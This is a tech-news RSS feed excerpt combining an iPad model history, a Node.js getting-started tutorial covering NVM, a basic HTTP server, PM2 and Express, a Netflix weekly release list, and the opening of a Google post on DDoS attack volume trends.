The budget iPad finally gained Apple Pencil (1st gen) support, opening digital handwriting and art to schools and casual creators without Pro prices. 



2018 — iPad Pro 11 (1st) &amp; 12.9 (3rd)







The design reset: USB-C, Face ID, edge-to-edge “Liquid Retina,” no home button, and Apple Pencil (2nd gen) that snapped on magnetically to pair/charge. This set today’s Pro identity. 



2019 — iPad mini (5th) and iPad Air (3rd, 10.5-inch)







Both moved to A12 and Pencil (1st) support; Air gained Smart Keyboard compatibility, becoming the “most iPad for most people” mid-tier. 



2019 — iPad (7th generation)







A new 10.2-inch size and Smart Connector brought keyboard support to the base iPad—great for typing and students.



2020 — iPad Pro (A12Z, 2nd-gen 11-inch / 4th-gen 12.9)







Refined Pros with LiDAR for AR and a Magic Keyboard with trackpad, steering iPad toward laptop-style workflows. 



2020 — iPad (8th) and iPad Air (4th, 10.9-inch)







Entry iPad jumped to A12, while Air 4 adopted the Pro-like design, USB-C, and Apple Pencil (2nd)—a huge value shift that blurred the Pro line from below. 



2021 — iPad Pro (M1), iPad (9th), iPad mini (6th)







The Pros moved to Apple’s M1 with Thunderbolt; the 12.9-inch added mini-LED XDR for HDR punch. The base iPad got A13 and Center Stage. The mini 6 was reborn: 8.3-inch, USB-C, and Pencil (2nd) support—tiny, powerful, modern. 



2022 — iPad Air (5th, M1), iPad (10th), iPad Pro (M2)







Air gained M1; the 10th-gen iPad switched to USB-C with a landscape camera (but awkwardly used Pencil (1st) via an adapter). Pros with M2 added Apple Pencil hover—a nuanced but meaningful creator feature. 



2024 — iPad Pro (M4, Ultra Retina XDR OLED) &amp; iPad Air (M2, 11- and 13-inch)







The Pro made its biggest leap since 2018: tandem OLED (“Ultra Retina XDR”), the M4 chip, the thinnest Apple product ever, and the debut of Apple Pencil Pro (squeeze, barrel roll, haptics). The Air moved to M2 and gained a 13-inch size. Apple dropped the 9th-gen iPad and lowered the 10th-gen price.



2024 (Fall) — iPad mini (7th, A17 Pro)







Mini caught up with a big internal jump, adopting A17 Pro and the latest Pencil options while keeping the 8.3-inch portability fans love. 



2025 (Spring) — iPad Air (M3)







A swift spec bump to M3 kept Air squarely in the “sweet spot” for performance-per-dollar, alongside the modern Magic Keyboard and Pencil lineup.



2025 (Spring) — iPad (11th Generation)







The iPad (11th generation) is Apple’s latest refresh of its most popular tablet. Powered by the A16 Bionic chip, it offers faster performance, improved multitasking, and better efficiency compared to the previous A14-based iPad.



Spec Comparison



YearModelChipPortApple Pencil SupportKey Highlights2010iPad 9.7″ (1st gen)A430-pin—First iPad; 1024×768 IPS display2011iPad 2A530-pin—First with cameras; Smart Cover support2012iPad (3rd gen)A5X30-pin—First Retina display (2048×1536)2012iPad (4th gen)A6XLightning—Lightning replaces 30-pin connector2012iPad mini (1st, 7.9″)A5Lightning—First iPad mini2013iPad Air (1st)A7 (64-bit)Lightning—First 64-bit iPad; thinner design2013iPad mini 2A7Lightning—First Retina mini2014iPad Air 2A8XLightning—First laminated + anti-reflective display2015iPad mini 4A8Lightning—Slimmer, more powerful mini2015iPad Pro 12.9″ (1st)A9XLightning1st genFirst Apple Pencil; quad speakers2016iPad Pro 9.7″A9XLightning1st genTrue Tone display debuts2017iPad (5th gen)A9Lightning—Budget iPad line returns2017iPad Pro 10.5″ / 12.9″ (2nd)A10XLightning1st genFirst ProMotion 120Hz display2018iPad (6th gen)A10Lightning1st genPencil support comes to base iPad2018iPad Pro 11″ / 12.9″ (3rd)A12XUSB-C2nd genFace ID, no Home button, new design2019iPad mini 5A12Lightning1st genA12 performance in mini2019iPad Air 3 (10.5″)A12Lightning1st genSmart Keyboard support2019iPad (7th gen, 10.2″)A10Lightning1st genSmart Connector on base iPad2020iPad Pro (A12Z)A12ZUSB-C2nd genAdds LiDAR, Magic Keyboard with trackpad2020iPad Air 4 (10.9″)A14USB-C2nd genBrings Pro-style design to Air2020iPad (8th gen)A12Lightning1st genValue refresh2021iPad Pro (M1)M1USB-C / Thunderbolt2nd genFirst with M-series chip; mini-LED XDR (12.9″)2021iPad (9th gen)A13Lightning1st genCenter Stage front camera2021iPad mini 6 (8.3″)A15USB-C2nd genAll-new design, modernized mini2022iPad Air 5M1USB-C2nd genM-series comes to Air2022iPad (10th gen, 10.9″)A14USB-CUSB-C / 1st gen via adapterLandscape front camera2022iPad Pro (M2)M2USB-C / Thunderbolt2nd genIntroduces Pencil hover2024iPad Air (M2, 11″ / 13″)M2USB-CPencil Pro / USB-CFirst 13″ Air; Pencil Pro support2024iPad Pro (M4, 11″ / 13″)M4USB-C / ThunderboltPencil ProUltra Retina XDR OLED; thinnest iPad yet2024iPad mini 7A17 ProUSB-CPencil Pro / USB-CMajor internal leap for mini2025iPad Air (M3)M3USB-CPencil Pro / USB-CSpec bump; keeps pace with Pro features2025iPad (11th gen)A16 BionicUSB-CPencil (1st gen) / USB-CMagic Keyboard Folio support; Smart Connector



Conclusion



From a 9.7-inch “big iPod touch” to an M4-powered OLED slate with a pro-grade stylus, iPad never stood still. The early years chased thinness and Retina clarity; then came Pro accessories and 120Hz; today, Apple silicon and OLED push the tablet squarely into laptop territory for many workflows. Whether you value a featherweight mini, a balanced Air, or the bleeding-edge Pro, there’s a clear through-line: every generation made the computer more touchable, more portable, and, bit by bit, more capable.



FAQs



Which iPad first supported Apple Pencil? The 2015 iPad Pro 12.9 introduced Apple Pencil (1st gen). Pencil support expanded to the budget iPad in 2018, then to Pencil (2nd) in the 2018 Pro redesign, and to Pencil Pro in 2024 on the new Pro/Air.  Which iPad first used USB-C? The 2018 iPad Pro line. Air switched in 2020, mini in 2021, and the 10th-gen iPad in 2022.  What’s the thinnest iPad? The 2024 iPad Pro (M4)—Apple’s thinnest product to date—despite packing tandem OLED and a huge performance jump.  Do all iPad Pros have 120Hz ProMotion? All modern Pros (2017 and later) do; the 2015/2016 Pros pre-date ProMotion.  Is the iPad mini still alive? Yes. Mini 7 (2024) upgraded to A17 Pro, keeping the compact 8.3-inch form while adding modern Pencil options.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nvidia Shield TV: Die Röhre bleibt wohl dauerhaft ausverkauft]]></title>
<description><![CDATA[Lang, lang ist es her: Nvidia hat 2019 seine „neueste“ Generation der Shield TV auf den Markt gebracht. Neben dem Pro-Design im bekannten Design, das den Modellen aus den Jahren 2015 und 2017 extrem ähnelt, veröffentlichte man anno dazumal auch...Zum Beitrag: Nvidia Shield TV: Die Röhre bleibt wo...]]></description>
<link>https://tsecurity.de/de/3666161/it-nachrichten/nvidia-shield-tv-die-roehre-bleibt-wohl-dauerhaft-ausverkauft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666161/it-nachrichten/nvidia-shield-tv-die-roehre-bleibt-wohl-dauerhaft-ausverkauft/</guid>
<pubDate>Mon, 13 Jul 2026 20:47:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Lang, lang ist es her: Nvidia hat 2019 seine „neueste“ Generation der Shield TV auf den Markt gebracht. Neben dem Pro-Design im bekannten Design, das den Modellen aus den Jahren 2015 und 2017 extrem ähnelt, veröffentlichte man anno dazumal auch...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/nvidia-shield-tv-die-roehre-bleibt-wohl-dauerhaft-ausverkauft/">Nvidia Shield TV: Die Röhre bleibt wohl dauerhaft ausverkauft</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Node.js tutorial: Get started with Node]]></title>
<description><![CDATA[Node.js is a popular and versatile cross-platform JavaScript runtime environment. Node was the first runtime to allow developers to run JavaScript outside the browser, opening a new world of possibilities in server-side JavaScript. Its ease of use, massive ecosystem and performance characteristic...]]></description>
<link>https://tsecurity.de/de/3665674/ai-nachrichten/nodejs-tutorial-get-started-with-node/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665674/ai-nachrichten/nodejs-tutorial-get-started-with-node/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:39 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2254485/what-is-nodejs-javascript-runtime-explained.html">Node.js</a> is a popular and versatile cross-platform <a href="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html">JavaScript</a> runtime environment. Node was the first runtime to allow developers to run JavaScript outside the browser, opening a new world of possibilities in <a href="https://www.infoworld.com/article/4052419/9-vital-concepts-of-modern-javascript.html" data-type="link" data-id="https://www.infoworld.com/article/4052419/9-vital-concepts-of-modern-javascript.html">server-side JavaScript</a>. Its ease of use, massive ecosystem and performance characteristics have continued to secure its place as one of the most important technologies of the modern web.</p>



<p class="wp-block-paragraph">Anytime you need to run JavaScript on the server—be it for a systems utility, a REST API, data processing, or anything else—Node is an excellent choice. There are newer runtimes, namely <a href="https://www.infoworld.com/article/2336271/deno-vs-nodejs-which-is-better.html">Deno</a> and <a href="https://www.infoworld.com/article/2338008/explore-bunjs-the-all-in-one-javascript-runtime.html">Bun</a>, but Node remains the standard for server-side JavaScript.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/2252306/10-javascript-concepts-every-nodejs-developer-must-master.html">10 JavaScript concepts you need to succeed with Node</a>.</strong></p>



<h2 class="wp-block-heading">Getting started with Node</h2>



<p class="wp-block-paragraph">If you haven’t already experienced Node, this article will introduce you. We’ll step through installing Node and the NPM package manager, spinning up a simple web server, and using the Node cluster module to take advantage of multiple CPU cores.</p>



<p class="wp-block-paragraph">We’ll also look at using the NPM package manager to install additional Node modules and other JavaScript packages. And we’ll dip a toe into using a Node framework, in this case the ubiquitous <a href="https://www.infoworld.com/article/3615615/intro-to-express-js-endpoints-parameters-and-routes.html">Express server</a>, to create more feature-rich and flexible Node.js servers. Let’s get started!</p>



<h2 class="wp-block-heading">Installing Node and NPM</h2>



<p class="wp-block-paragraph">There are <a href="https://docs.npmjs.com/downloading-and-installing-node-js-and-npm">a few ways to install Node</a>, including the installer that <a href="https://docs.npmjs.com/downloading-and-installing-node-js-and-npm">Node itself provides</a>, but the recommended way is with a version manager. The most common version manager is <a href="https://github.com/nvm-sh/nvm">NVM</a>. This makes it easy to install Node and change versions when you need to. (There is also a Microsoft Windows-specific version called <a href="https://github.com/coreybutler/nvm-windows/releases">nvm-windows</a>.)</p>



<p class="wp-block-paragraph">NVM can be installed with an installer or using a CLI. In the following example, we use <code>curl</code>:</p>



<pre class="wp-block-code"><code>
$ curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.3/install.sh | bash</code></pre>



<p class="wp-block-paragraph">Once you have NVM installed, installing the most recent version of Node is simple:</p>



<pre class="wp-block-code"><code>
$ nvm install latest
</code></pre>



<p class="wp-block-paragraph">The <code>install latest</code> command makes the latest version available. Mine is Node 24.9.0, so I activate it with:</p>



<pre class="wp-block-code"><code>$ nvm use 24.9.0</code></pre>



<p class="wp-block-paragraph">Anytime you need to install another version of Node, you can use <code>nvm install</code> and <code>nvm use</code> to switch between them.</p>



<p class="wp-block-paragraph">You should now see Node available at your command prompt:</p>



<pre class="wp-block-code"><code>
$ node -v

v24.9.0</code></pre>



<p class="wp-block-paragraph">When you install Node this way, the Node package manager (NPM) is also installed:</p>



<pre class="wp-block-code"><code>$ npm -v

11.6.0</code></pre>



<p class="wp-block-paragraph">Note that using NVM also avoids potential permissions issues with NPM packages when using the installer.</p>



<h2 class="wp-block-heading">A simple web server in Node</h2>



<p class="wp-block-paragraph">To start simply, we can use <a href="https://nodejs.org/api/synopsis.html">an example from the Node homepage</a>. Copy the Synopsis example code as directed there and paste it into your code editor, then save it as <code>example.js</code>:</p>



<pre class="wp-block-code"><code>
const http = require('node:http');

const hostname = '127.0.0.1';
const port = 3000;

const server = http.createServer((req, res) =&gt; {
  res.statusCode = 200;
  res.setHeader('Content-Type', 'text/plain');
  res.end('Hello, InfoWorld!\n');
});

server.listen(port, hostname, () =&gt; {
  console.log(`Server running at http://${hostname}:${port}/`);
});</code></pre>



<p class="wp-block-paragraph">Open a shell in the directory where you saved the file, and run the file from your command line:</p>



<pre class="wp-block-code"><code>
$ node example.js

Server running at http://127.0.0.1:3000/</code></pre>



<p class="wp-block-paragraph">You can now go to the browser and check it out at <code>127.0.0:3000</code>, and you should see a simple greeting. Back at the terminal, press <strong>Control-C</strong> to stop the running server.</p>



<p class="wp-block-paragraph">Before we go further, let’s pull apart the code.</p>



<h3 class="wp-block-heading">Creating a simple HTTP server with Node</h3>



<p class="wp-block-paragraph">We start with the command:</p>



<pre class="wp-block-code"><code>const http = require(‘http’);</code></pre>



<p class="wp-block-paragraph">This is how you include a module in your code, in this case, the standard <a href="https://nodejs.org/api/http.html">http module</a>. (The <code>http</code> module ships with Node, so you don’t have to add it as a dependency.) This module provides the <a href="https://nodejs.org/api/http.html#http_http_createserver_requestlistener">createServer</a> and <code>listen</code> functions we’ll use later on.</p>



<p class="wp-block-paragraph">You might have noted that this example used a <a href="https://nodejs.org/api/modules.html">CommonJS</a> import. While older, this style of import is still very common in Node programs as well as some documentation. However, it’s gradually being phased out in favor of <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Modules">ES Modules</a> (ESM), the standardized module system introduced in ECMAScript 2015. An ESM import would look like this:</p>



<pre class="wp-block-code"><code>import http from 'http';</code></pre>



<p class="wp-block-paragraph">After we import the <code>http</code> module, we define a couple of values we need (<code>hostname</code> and <code>port</code>):</p>



<pre class="wp-block-code"><code>const hostname = '127.0.0.1';

const port = 3000;</code></pre>



<p class="wp-block-paragraph">Next, we create the server:</p>



<pre class="wp-block-code"><code>const server = http.createServer((req, res) =&gt; {
  res.statusCode = 200;
  res.setHeader(‘Content-Type’, ‘text/plain’);
  res.end(‘Hello World\n’);
});</code></pre>



<p class="wp-block-paragraph">The <code>creatServer </code>command accepts a callback function, which we define using the fat arrow notation. The callback function passes two arguments, the request (<code>req</code>) and response (<code>res</code>) objects needed to handle HTTP requests. The <code>req</code> argument contains the incoming HTTP request, which in this case is ignored. The <code>res.end</code> method sets the response data to <code>‘Hello InfoWorld\n’</code> and tells the server that it is done creating the response.</p>



<p class="wp-block-paragraph">Next, we have:</p>



<pre class="wp-block-code"><code>server.listen(port, hostname, () =&gt; {
  console.log(`Server running at http://${hostname}:${port}/`);
});</code></pre>



<p class="wp-block-paragraph">The <code>server.listen</code> function accepts three arguments. The first two are the <code>port</code> and <code>hostname</code>, and the third is a callback that is executed when the server is ready (in this case, it prints a message to the console).</p>



<p class="wp-block-paragraph">Having all the event handlers defined as callbacks is one of the most subtle and powerful parts of Node. It’s key to Node’s asynchronous non-blocking architecture.</p>



<p class="wp-block-paragraph">Node.js runs on <a href="https://www.infoworld.com/article/4052419/9-vital-concepts-of-modern-javascript.html">an event loop</a>, which always reverts to handling events when not otherwise engaged. It’s like a busy order-taker continually picking up orders and then updating the order-maker with their order. We receive updates via the callbacks.</p>



<h2 class="wp-block-heading">A multi-process web server with Node</h2>



<p class="wp-block-paragraph">Node’s asynchronous, non-blocking nature makes it good at handling many parallel requests, but it’s not truly concurrent by default. There are <a href="https://www.infoworld.com/article/2513020/intro-to-multithreaded-javascript.html">a few ways to make a Node application use multiple threads</a> for true concurrency. One of the simplest is to use the <a href="https://pm2.keymetrics.io/">PM2 project</a>, which lets you run the same Node application in many processes.</p>



<p class="wp-block-paragraph">By launching each application instance in its own process, the operating system can make use of multiple cores on the machine. This is not usually a concern at first, but it’s a key performance consideration to bear in mind.</p>



<p class="wp-block-paragraph">You can install PM2 globally like so:</p>



<pre class="wp-block-code"><code>$ npm install -g pm2</code></pre>



<p class="wp-block-paragraph">For our example, we want to make it obvious that the different processes are handling requests. We can achieve that goal with a small change to the server:</p>



<pre class="wp-block-code"><code>res.end(`Hello, InfoWorld! Handled by ${process.pid}`);</code></pre>



<p class="wp-block-paragraph">The <code>process.pid </code>field is a built-in environment variable, providing a unique ID for the currently running process in Node. Once PM2 is installed and the app is updated, we can run it like so:</p>



<pre class="wp-block-code"><code>$ pm2 start example.js -i max</code></pre>



<p class="wp-block-paragraph">That should launch several instances of the same program, as shown here:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/11/Node-tutorial-fig3v2.png?w=1024" alt="Screenshot of a multi-process Node-based web server running several instances of the same program." class="wp-image-4089570" width="1024" height="575" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<p class="wp-block-paragraph">Then, if you open multiple windows, you can see the unique ID of each instance:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/11/Node-tutorial-fig2v2.png?w=1024" alt="Screenshot of a Node-based multi-process web server showing the unique ID of each instance." class="wp-image-4089571" width="1024" height="536" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Matthew Tyson</p></div>



<h2 class="wp-block-heading">An Express web server with Node</h2>



<p class="wp-block-paragraph">For our final example, we’ll look at setting up an <a href="https://www.infoworld.com/article/3615615/intro-to-express-js-endpoints-parameters-and-routes.html">Express</a> web server in Node. This time we’ll use NPM to download Express and its dependencies. NPM is one of the greatest storehouses of software on the planet, with literally <a href="https://www.npmjs.com/">millions of libraries available</a>. Knowing how to use it is essential for working with Node.</p>



<p class="wp-block-paragraph">NPM works just like other package managers you may have used, letting you define and install dependencies in a structured way. To install Express, go to your project directory and type:</p>



<pre class="wp-block-code"><code>$ npm install express</code></pre>



<p class="wp-block-paragraph">Node should respond with something like: <code>added 68 packages in 5s</code>.</p>



<p class="wp-block-paragraph">You will notice several directories have been added to a <code>/node_modules</code> directory. Those are all the dependencies needed for Express. You usually don’t have to interact with <code>node_modules</code> yourself, but it’s good to know that’s where things are saved.</p>



<p class="wp-block-paragraph">Now look at the <code>package.json</code> file, which will have something like this in it:</p>



<pre class="wp-block-code"><code>{
  "dependencies": {
	"express": "^5.1.0"
  }
}</code></pre>



<p class="wp-block-paragraph">This is how dependencies are defined in NPM. It says the application needs the express dependency at version 5.1.0 (or greater).</p>



<h3 class="wp-block-heading">Setting up the Express server in Node</h3>



<p class="wp-block-paragraph">Express is one of the most-deployed pieces of software on the Internet. It can be a minimalist server framework for Node that handles all the essentials of HTTP, and it’s also expandable using “middleware” plugins.</p>



<p class="wp-block-paragraph">Since we’ve already installed Express, we can jump right into defining a server. Open the <code>example.js</code> file we used previously and replace the contents with this simple Express server:</p>



<pre class="wp-block-code"><code>import express from 'express';

const app = express();
const port = 3000;

app.get('/', (req, res) =&gt; {
  res.send('Hello, InfoWorld!');
});

app.listen(port, () =&gt; {
  console.log(`Express server at http://localhost:${port}`);
});</code></pre>



<p class="wp-block-paragraph">This program does the same thing as our earlier <code>http</code> module version. The most important change is that we’ve added routing. Express makes it easy for us to associate a URL path, like the root path (<code>‘/’</code>), with the handler function.</p>



<p class="wp-block-paragraph">If we wanted to add another path, it could look like this:</p>



<pre class="wp-block-code"><code>app.get('/about', (req, res) =&gt; {
  res.send('This is the About page.');
});</code></pre>



<p class="wp-block-paragraph">Once we have the basic web server set up with one or more paths, we’ll probably need to create a few API endpoints that respond with JSON. Here’s an example of a route that returns a JSON object:</p>



<pre class="wp-block-code"><code>app.get('/api/user', (req, res) =&gt; {
  res.json({
	id: 1,
	name: 'John Doe',
	role: 'Admin'
  });
});</code></pre>



<p class="wp-block-paragraph">That’s a simple example, but it gives you a taste of working with Express in Node.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">In this article you’ve seen how to install Node and NPM and how to set up both simple and more advanced web servers in Node. Although we’ve only touched on the basics, these examples demonstrate many elements that are required for all Node applications, including the ability to import modules.</p>



<p class="wp-block-paragraph">Whenever you need a package to do something in Node, you will more than likely find it available on <a href="https://www.npmjs.com/">NPM</a>. Visit the official site and use the search feature to find what you need. For more information about a package, you can use the <a href="http://npms.io/">npms.io</a> tool. Keep in mind that a project’s health depends on its weekly download metric (visible on NPM for the package itself). You can also check a project’s GitHub page to see how many stars it has and how many times it’s been forked; both are good measures of success and stability. Another important metric is how recently and frequently the project is updated and maintained. That information is also visible on a project’s GitHub Insights page.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s Coming to Netflix This Week (July 13 to 19): Every New Movie and Show]]></title>
<description><![CDATA[Netflix has a packed schedule for the week of July 13 through July 19, 2026, with new original series, returning favorites, blockbuster movies, documentaries, live sports, and international releases. Whether you enjoy romantic dramas, comedy, thrillers, anime, or action franchises, this week's li...]]></description>
<link>https://tsecurity.de/de/3665389/ios-mac-os/whats-coming-to-netflix-this-week-july-13-to-19-every-new-movie-and-show/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665389/ios-mac-os/whats-coming-to-netflix-this-week-july-13-to-19-every-new-movie-and-show/</guid>
<pubDate>Mon, 13 Jul 2026 15:25:47 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Netflix has a packed schedule for the week of July 13 through July 19, 2026, with new original series, returning favorites, blockbuster movies, documentaries, live sports, and international releases. Whether you enjoy romantic dramas, comedy, thrillers, anime, or action franchises, this week's lineup offers something for every kind of viewer.



The biggest highlights include the feature-length finale Heartstopper Forever, Will Ferrell's new comedy series The Hawk, and the arrival of the complete Hunger Games film collection. Netflix is also expanding its lineup with live sports, podcasts, Korean dramas, and Japanese series throughout the week.



Biggest Netflix Releases This Week



TitleRelease DateGenreHeartstopper ForeverJuly 17Romance, DramaThe Hawk Season 1July 16ComedyThe Hunger Games CollectionJuly 14Action, Sci-FiQuarterback Season 3July 14Sports DocumentaryThe Ultimatum: Marry or Move On Season 4July 15RealityThe East PalaceJuly 17Fantasy K-DramaThe Walking Dead: Daryl Dixon Season 3July 19Horror, Action



Top Picks You Shouldn't Miss



Heartstopper Forever




https://www.youtube.com/watch?v=locuQ-skySE




Nick and Charlie return for one final chapter in Heartstopper Forever, a feature-length special that concludes one of Netflix's most popular coming-of-age romances. As Nick prepares for university, both characters face difficult choices about their future together, while their friends also begin new stages of adulthood. The film stars Kit Connor and Joe Locke and arrives on Friday, July 17.



The Hawk




https://www.youtube.com/watch?v=sSRJ6PXHx88




Will Ferrell headlines Netflix's newest comedy series as Lonnie "The Hawk" Hawkins, a former golf champion who refuses to retire. Despite his age and injuries, he attempts one final comeback while competing against his talented son. The series premieres on Thursday, July 16.



The Hunger Games Collection



Fans of dystopian action can binge the entire franchise beginning Tuesday, July 14. Netflix is adding:




The Hunger Games (2012)



Catching Fire (2013)



Mockingjay Part 1 (2014)



Mockingjay Part 2 (2015)



The Ballad of Songbirds &amp; Snakes (2023)




The addition of the 2023 prequel makes this one of the biggest licensed movie collections arriving this month.



Full Netflix Release Schedule



DateNew ReleasesJuly 13 (Monday)Golden Kamuy: The Abashiri Prison Raid, Hot Ones: Extra Heat, Jim Thorpe: Lit by Lightning, Mile End Kicks, MLB Home Run Derby (LIVE), On Purpose with Jay ShettyJuly 14 (Tuesday)Quarterback Season 3, Technically, The Hunger Games collectionJuly 15 (Wednesday)Snowden, The Tick Seasons 1 and 2, The Ultimatum Season 4July 16 (Thursday)The Hawk, Me Before Me, Love You So Bad, The Body in the LockerJuly 17 (Friday)Heartstopper Forever, Heartstopper Forever: Official Podcast, 23 000 Lives, Desire, The East Palace, The Map of LongingJuly 18 (Saturday)Spooky in LoveJuly 19 (Sunday)The Walking Dead: Daryl Dixon Season 3, Soar High!, You Can't Expense This!



Other Notable Arrivals



Several additional releases deserve attention this week.




Quarterback Season 3 follows NFL stars Jayden Daniels, Baker Mayfield, Cam Ward, and Joe Flacco through another football season.



The East Palace introduces a supernatural mystery set inside a haunted royal palace.



23 000 Lives tells the true story of volunteers rescuing refugees in the Mediterranean.



Desire delivers a suspenseful Mexican thriller centered on a dangerous affair.



On Purpose with Jay Shetty expands the popular podcast into a Netflix video series featuring celebrity interviews.




Quick Watch Guide



Looking ForWatchRomanceHeartstopper ForeverComedyThe HawkActionThe Hunger Games CollectionReality TVThe Ultimatum Season 4SportsQuarterback Season 3DocumentaryJim Thorpe: Lit by LightningK-DramaThe East Palace, Spooky in LoveZombie DramaThe Walking Dead: Daryl Dixon Season 3



Final Thoughts



The week of July 13 to July 19 is one of Netflix's strongest lineups this month. The emotional conclusion of Heartstopper, the arrival of The Hunger Games franchise, and Will Ferrell's new comedy The Hawk headline a schedule that also includes documentaries, live sports, reality shows, anime, and international originals.



If you're planning a weekend binge, this week's releases provide plenty of options across every major genre.]]></content:encoded>
</item>
<item>
<title><![CDATA[Guide to Loop Engineering: How ‘autoresearch’ and ‘Bilevel Autoresearch’ Turn AI Agents Into Autonomous Machine Learning ML Research Loops]]></title>
<description><![CDATA[Most people still use AI like a 2015 search box. You type, you read, you type again. A newer pattern replaces that manual back-and-forth with a loop. This guide explains loop engineering using two verified artifacts. The sources are Andrej Karpathy’s autoresearch repository and the Bilevel Autore...]]></description>
<link>https://tsecurity.de/de/3663827/ai-nachrichten/guide-to-loop-engineering-how-autoresearch-and-bilevel-autoresearch-turn-ai-agents-into-autonomous-machine-learning-ml-research-loops/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663827/ai-nachrichten/guide-to-loop-engineering-how-autoresearch-and-bilevel-autoresearch-turn-ai-agents-into-autonomous-machine-learning-ml-research-loops/</guid>
<pubDate>Sun, 12 Jul 2026 22:33:03 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Most people still use AI like a 2015 search box. You type, you read, you type again. A newer pattern replaces that manual back-and-forth with a loop. This guide explains loop engineering using two verified artifacts. The sources are Andrej Karpathy’s autoresearch repository and the Bilevel Autoresearch paper. The framing follows a write-up by @0xCodila. […]</p>
<p>The post <a href="https://www.marktechpost.com/2026/07/12/guide-to-loop-engineering/">Guide to Loop Engineering: How ‘autoresearch’ and ‘Bilevel Autoresearch’ Turn AI Agents Into Autonomous Machine Learning ML Research Loops</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Exponential growth in DDoS attack volumes]]></title>
<description><![CDATA[Security threats such as distributed denial-of-service (DDoS) attacks disrupt businesses of all sizes, leading to outages, and worse, loss of user trust. These threats are a big reason why at Google we put a premium on service reliability that’s built on the foundation of a rugged network. To hel...]]></description>
<link>https://tsecurity.de/de/3662839/it-security-nachrichten/exponential-growth-in-ddos-attack-volumes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662839/it-security-nachrichten/exponential-growth-in-ddos-attack-volumes/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Security threats such as distributed denial-of-service (DDoS) attacks disrupt businesses of all sizes, leading to outages, and worse, loss of user trust. These threats are a big reason why at Google we put a premium on service reliability that’s built on the foundation of a rugged network. </p><p>To help ensure reliability, we’ve devised some innovative ways to defend against advanced attacks. In this post, we’ll take a deep dive into DDoS threats, showing the trends we’re seeing and describing how we prepare for multi-terabit attacks, so your sites stay up and running.</p><h3>Taxonomy of attacker capabilities</h3><p>With a DDoS attack, an adversary hopes to disrupt their victim's service with a flood of useless traffic. While this attack doesn't expose user data and doesn't lead to a compromise, it can result in an outage and loss of user trust if not quickly mitigated.</p><p>Attackers are constantly developing new techniques to disrupt systems. They give their attacks fanciful names, like Smurf, Tsunami, XMAS tree, HULK, Slowloris, cache bust, TCP amplification, javascript injection, and a dozen variants of reflected attacks. Meanwhile, the defender must consider every possible target of a DDoS attack, from the network layer (routers/switches and link capacity) to the application layer (web, DNS, and mail servers). Some attacks may not even focus on a specific target, but instead attack every IP in a network. Multiplying the dozens of attack types by the diversity of infrastructure that must be defended leads to endless possibilities.</p><p>So, how can we simplify the problem to make it manageable? Rather than focus on attack methods, Google groups volumetric attacks into a handful of key metrics:</p><p></p><ul><li><b>bps</b>	network bits per second → attacks targeting network links</li><li><b>pps</b>	network packets per second → attacks targeting network equipment or DNS servers</li><li><b>rps</b>	HTTP(S) requests per second → attacks targeting application servers</li></ul><p></p><p>This way, we can focus our efforts on ensuring each system has sufficient capacity to withstand attacks, as measured by the relevant metrics.</p><h3>Trends in DDoS attack volumes</h3><p>Our next task is to determine the capacity needed to withstand the largest DDoS attacks for each key metric. Getting this right is a necessary step for efficiently operating a reliable network—overprovisioning wastes costly resources, while underprovisioning can result in an outage.</p><p>To do this, we analyzed hundreds of significant attacks we received across the listed metrics, and included credible reports shared by others. We then plot the largest attacks seen over the past decade to identify trends. (Several years of data prior to 